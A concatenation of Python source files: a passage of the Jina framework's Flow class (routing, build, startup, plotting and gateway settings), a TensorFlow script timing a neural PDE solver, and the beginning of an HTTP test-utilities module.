deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self) -> bool:
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('graph LR', 'graph TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(self):
"""Block the process until user hits KeyboardInterrupt"""
try:
threading.Event().wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** This function was only accepting dump_path as the only potential arg to override
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
Time_Network.py
|
import argparse
import numpy as np
import tensorflow as tf
#from reader_frozen import plot_prediction, convert_time, read_data, read_mesh, read_soln
import os
import sys
import time
import multiprocessing
import threading
import csv
# Import flags specifying dataset parameters
from timer_flags import getFlags
DATA_COUNT = 10*20*50
#DATA_COUNT = 5000
increment = 1000
batch_size = 250
#batches = 4
MODEL_DIR = "/home/nick/Research/ConvPDE/Poisson_Varying_Domain/Model_1/"
SETUP_DIR = "./"
data_dir = "Data/"
mesh_dir = "Meshes/"
soln_dir = "Solutions/"
# Load graph from frozen .pb file
def load_graph(frozen_model_folder):
#frozen_graph_filename = frozen_model_folder + "frozen_model.pb"
frozen_graph_filename = frozen_model_folder + "optimized_frozen_model.pb"
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
producer_op_list=None
)
return graph
## Neural Network
def network_times():
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", default=MODEL_DIR, type=str, help="Model folder to export")
parser.add_argument("--DATA_dir", default=SETUP_DIR, type=str, help="Folder containing dataset subdirectories")
parser.add_argument("--default_res", default=128, type=int, help="Resolution of data")
parser.add_argument("--ID", default=0, type=int, help="ID to plot")
parser.add_argument("--slice_plot", default=False, action="store_true", help="Plot a slice of the prediction/solution")
parser.add_argument("--show_error", default=False, action="store_true", help="Plot the error between the prediction and solution")
parser.add_argument("--use_hires", default=False, action="store_true", help="Option to use high resolution data")
parser.add_argument("--no_gpu", default=False, action="store_true", help="Specify if GPU is not being used")
parser.add_argument("--save_solutions", default=False, action="store_true", help="Option to save solutions to file")
parser.add_argument("--time_count", default=1, type=int, help="Time count for time tests")
args = parser.parse_args()
default_res = args.default_res
DATA_dir = args.DATA_dir
slice_plot = args.slice_plot
show_error = args.show_error
graph = load_graph(args.model_dir)
ID = args.ID
USE_HIRES = args.use_hires
NO_GPU = args.no_gpu
time_count = args.time_count
save_solutions = args.save_solutions
# Display operators defined in graph
#for op in graph.get_operations():
#print(op.name)
# Define input and output nodes
data = graph.get_tensor_by_name('prefix/data_test:0')
mesh = graph.get_tensor_by_name('prefix/mesh_test:0')
soln = graph.get_tensor_by_name('prefix/soln_test:0')
y_pred = graph.get_tensor_by_name('prefix/masked_pred_test:0')
y_scale = graph.get_tensor_by_name('prefix/masked_scale_test:0')
with tf.Session(graph=graph) as sess:
# Run initial session to remove graph loading time
"""
# Read mesh and data files
source = read_data(0, os.path.join(DATA_dir,data_dir), USE_HIRES=USE_HIRES)
data_batch = np.expand_dims(np.transpose(source, (1, 2, 0)),0)
mesh_data = read_mesh(0, os.path.join(DATA_dir,mesh_dir), USE_HIRES=USE_HIRES)
mesh_batch = np.expand_dims(np.transpose(mesh_data, (1, 2, 0)),0)
# Compute network prediction
y_out = sess.run(y_pred, feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
"""
batches = int(time_count*increment/batch_size)
#for count, batches in enumerate([int(n*increment/batch_size) for n in range(1,11)]):
for _ in range(0,1):
#count = 0
#batches = int(DATA_COUNT/batch_size)
# Start count at 1
#count += 1
#print("\n [ Loading Data ] \n")
#indices = np.array([n for n in range(0,DATA_COUNT)])
indices = np.array([n for n in range(0,int(time_count*increment))])
data_batches = []
mesh_batches = []
#soln_batches = []
start = time.perf_counter()
#mesh_array = np.load(mesh_dir + "Meshes.npy")
#data_array = np.load(data_dir + "Data.npy")
mesh_array = np.load(mesh_dir + "Meshes_0.npy")
data_array = np.load(data_dir + "Data_0.npy")
for n in range(1,time_count):
tmp_mesh_array = np.load(mesh_dir + "Meshes_" + str(n) + ".npy")
tmp_data_array = np.load(data_dir + "Data_" + str(n) + ".npy")
mesh_array = np.concatenate([mesh_array, tmp_mesh_array], axis=0)
data_array = np.concatenate([data_array, tmp_data_array], axis=0)
mesh_batches = np.split(mesh_array, batches, axis=0)
data_batches = np.split(data_array, batches, axis=0)
"""
def load_batch(n,dlist,mlist,tinds):
data_batch, mesh_batch = get_batch(n, batch_size, indices)
dlist.append(data_batch)
mlist.append(mesh_batch)
tinds.append(n)
remaining_batches = batches
step = 0
tinds = []
# Specify number of threads for loading data
THREADS = 8
while remaining_batches > 0:
sys.stdout.write(" Batch %d of %d\r" %(batches-remaining_batches+1, batches))
sys.stdout.flush()
THREADS = np.min([THREADS, remaining_batches])
threadList = []
for n in range(step,step+THREADS):
threadList.append(threading.Thread(target=load_batch, args=(n,data_batches,mesh_batches,tinds)))
for t in threadList:
t.start()
for t in threadList:
t.join()
step += THREADS
remaining_batches -= THREADS
sys.stdout.write(" Batch %d of %d\r" %(batches, batches))
sys.stdout.flush()
permute = np.argsort(np.array(tinds)).tolist()
data_batches = [data_batches[i] for i in permute]
mesh_batches = [mesh_batches[i] for i in permute]
#data_batches = np.reshape(np.array(data_batches)[permute], [-1,default_res,default_res,1])
#mesh_batches = np.reshape(np.array(mesh_batches)[permute], [-1,default_res,default_res,1])
"""
"""
for n in range(0,batches):
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
#data_batch, mesh_batch, soln_batch = get_batch(n, batch_size, indices)
data_batch, mesh_batch = get_batch(n, batch_size, indices)
data_batches.append(data_batch)
mesh_batches.append(mesh_batch)
#soln_batches.append(soln_batch)
"""
end = time.perf_counter()
load_time = end - start
#print("\n\nLoad Time: %.5f seconds" %(load_time))
#print("\n")
if NO_GPU:
print("\n [ Evaluating Network {:} ] \n".format(time_count))
else:
print("\n [ Evaluating Network (GPU) {:} ] \n".format(time_count))
start = time.perf_counter()
#for data_batch, mesh_batch, soln_batch in data:
for n in range(0, batches):
data_batch = data_batches[n]
mesh_batch = mesh_batches[n]
#soln_batch = soln_batches[n]
# SCALE INPUT DATA
scaling_factors = np.amax(np.abs(data_batch), axis=(1,2,3))[:,np.newaxis,np.newaxis,np.newaxis]
data_batch = data_batch/scaling_factors
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
# Compute network prediction
y_out, y_s = sess.run([y_pred, y_scale], feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
# RESCALE OUTPUT DATA
y_out = y_out * scaling_factors
if save_solutions:
batch_indices = [k for k in range(n*batch_size, (n+1)*batch_size)]
batch_IDs = indices[batch_indices]
for ID in batch_IDs:
filename = "./Solutions/network_solution_" + str(ID) + ".npy"
np.save(filename, y_out[ID - n*batch_size,:,:,0])
end = time.perf_counter()
## TIMES WITHOUT LOADING
#total_time = end - start
#batch_time = total_time / batches
#average_time = batch_time / batch_size
#print("\nTotal Time: %.5f seconds" %(total_time))
#print("\nBatch Time: %.5f seconds" %(batch_time))
#print("\nAverage Time: %.5f seconds" %(average_time))
## TIMES INCLUDING LOADING
ltotal_time = (end - start) + load_time
lbatch_time = ltotal_time / batches
laverage_time = lbatch_time / batch_size
#print("\n\n")
#print(" SOLVE TIMES:\n")
#print("\n - Total Time: %.5f seconds" %(ltotal_time))
#print(" - Batch Time: %.5f seconds" %(lbatch_time))
print(" ( Average Time: %.5f seconds )\n" %(laverage_time))
if NO_GPU:
filename = "Network_Times_NO_GPU.csv"
else:
filename = "Network_Times.csv"
## Remove pre-existing file
#if os.path.exists(filename):
# os.remove(filename)
with open(filename, 'a') as csvfile:
#csvfile.write("Total Time: %.5f\n" %(total_time))
#csvfile.write("Batch Time: %.5f\n" %(batch_time))
#csvfile.write("Average Time: %.5f\n" %(average_time))
#csvfile.write("\nWITH LOADING:")
#csvfile.write("Total Time: %.5f\n" %(ltotal_time))
#csvfile.write("Batch Time: %.5f\n" %(lbatch_time))
#csvfile.write("Average Time: %.5f\n" %(laverage_time))
csvfile.write("%d %.7f %.7f %.7f\n" %(int((time_count)*increment), ltotal_time, lbatch_time, laverage_time))
#csvfile.write("%d %.7f %.7f %.7f\n" %(DATA_COUNT, ltotal_time, lbatch_time, laverage_time))
# Evaluate network on specified input data and plot prediction
if __name__ == '__main__':
network_times()
|
utils_for_tests.py
|
# Python imports
import sys
import calendar
import socket
import os
import time
import threading
import datetime
from wsgiref.handlers import format_date_time as format_as_rfc1123
PY_MAJOR_VERSION = sys.version_info[0]
PY_MINOR_VERSION = sys.version_info[1]
if PY_MAJOR_VERSION < 3:
from BaseHTTPServer import BaseHTTPRequestHandler
else:
from http.server import BaseHTTPRequestHandler
# FIXME - resource warning due to this? https://bugs.python.org/issue19524
WEEKDAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
def find_unused_port():
"""Return an unused port. This code was written by Damon Kohler and it's under a PSF license.
It's from here:
http://code.activestate.com/recipes/531822-pick-unused-port/
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def format_as_rfc850(a_datetime):
"""Given a UTC datetime.datetime instance, return it formatted in RFC 850 format.
e.g. - Sunday, 06-Nov-94 08:49:37 GMT
"""
# I can't do this the obvious way -- using the formatters in strftime() -- because that returns
# locale-aware weekday and month names, and the HTTP spec requires English-only names.
RFC850_FORMAT = "{}, {:02}-{}-{:02} {:02}:{:02}:{:02} GMT"
weekday = WEEKDAYS[a_datetime.weekday()]
month = MONTHS[a_datetime.month - 1]
